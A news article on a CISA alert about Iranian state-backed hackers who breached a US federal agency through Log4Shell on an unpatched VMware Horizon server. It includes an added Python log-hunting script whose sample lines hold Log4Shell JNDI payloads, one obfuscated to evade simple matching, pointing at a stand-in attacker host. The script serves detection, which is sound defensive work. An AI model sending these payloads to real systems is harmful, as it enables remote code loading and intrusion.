US: Iranian Hackers Breached Government with Log4Shell

The US authorities have urged all agencies to patch VMware systems after revealing that Iranian state-backed actors exploited the Log4Shell bug to compromise a government organization.

The alert from the Cybersecurity and Infrastructure Security Agency (CISA) claimed the unnamed Federal Civilian Executive Branch (FCEB) organization was compromised as long ago as February 2022.

An incident response engagement starting mid-June uncovered the compromise, which used the infamous Log4j bug for initial access.

“In the course of incident response activities, CISA determined that cyber-threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto-mining software, moved laterally to the domain controller (DC), compromised credentials and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” CISA said.

“CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities.”

If agencies detect initial access or compromise, they should also assume lateral movement, investigate any connected systems and audit privileged accounts, the alert continued.
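One way to start the hunt CISA recommends is to look through web-server or Horizon access logs for Log4Shell lookup strings, including the nested `${lower:…}`, `${upper:…}` and `${…:-…}` wrappers that Log4j 2 evaluates before the lookup runs and that plain string matching misses. This is an added example, not code from the CISA alert or the article; the log lines, IP addresses, hostnames and URL path are constructed.

```python
import re

# Constructed sample lines in a common access-log shape; the last quoted
# field stands in for the User-Agent header, a frequently logged input.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Jun/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [14/Jun/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [14/Jun/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-l}dap://attacker.example/b}"',
    '10.0.0.7 - - [14/Jun/2022:10:02:00 +0000] "GET /portal/ HTTP/1.1" 200 "${env:HOME} harmless lookup-looking text"',
]

# Wrappers Log4j 2 resolves to their inner text: ${lower:x}, ${upper:x},
# and ${anything:-x} (the default-value form, e.g. ${::-x}).
_WRAPPERS = [
    (re.compile(r'\$\{lower:([^${}]*)\}', re.I), lambda m: m.group(1).lower()),
    (re.compile(r'\$\{upper:([^${}]*)\}', re.I), lambda m: m.group(1).upper()),
    (re.compile(r'\$\{[^${}]*:-([^${}]*)\}'), lambda m: m.group(1)),
]

# The lookup that triggers the remote class load; matched case-insensitively.
JNDI = re.compile(r'\$\{\s*jndi\s*:', re.I)


def normalize(s: str, max_rounds: int = 10) -> str:
    """Collapse nested wrapper lookups inside-out until nothing changes."""
    for _ in range(max_rounds):
        before = s
        for pat, repl in _WRAPPERS:
            s = pat.sub(repl, s)
        if s == before:
            break
    return s


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return JNDI.search(normalize(line)) is not None


def hunt(lines):
    """Return (line_number, normalized_line) for every suspicious line."""
    return [(n, normalize(l)) for n, l in enumerate(lines, 1)
            if JNDI.search(normalize(l))]


if __name__ == "__main__":
    for n, norm in hunt(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

A hit only shows that a probe reached the server; per the alert, the next step is to check whether that host was patched at the time and to hunt for follow-on activity such as unexpected miner or reverse-proxy processes.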

Back in September, CISA and US allies warned that Iranian threat actors were exploiting Log4Shell on VMware Horizon systems in widespread ransomware campaigns linked to the Islamic Revolutionary Guard Corps (IRGC).

VMware urged customers back in January to patch any internet-facing Horizon servers.

Given the deployment of crypto-mining malware on the US government organization, it’s unclear whether the threat actors’ primary goal was to generate revenue or support wider cyber-espionage aims.

Log4Shell continues to cause organizations problems, thanks to the ubiquity of the Log4j utility.

When it was first discovered in December 2021, experts warned that it could still be used in attacks years later.
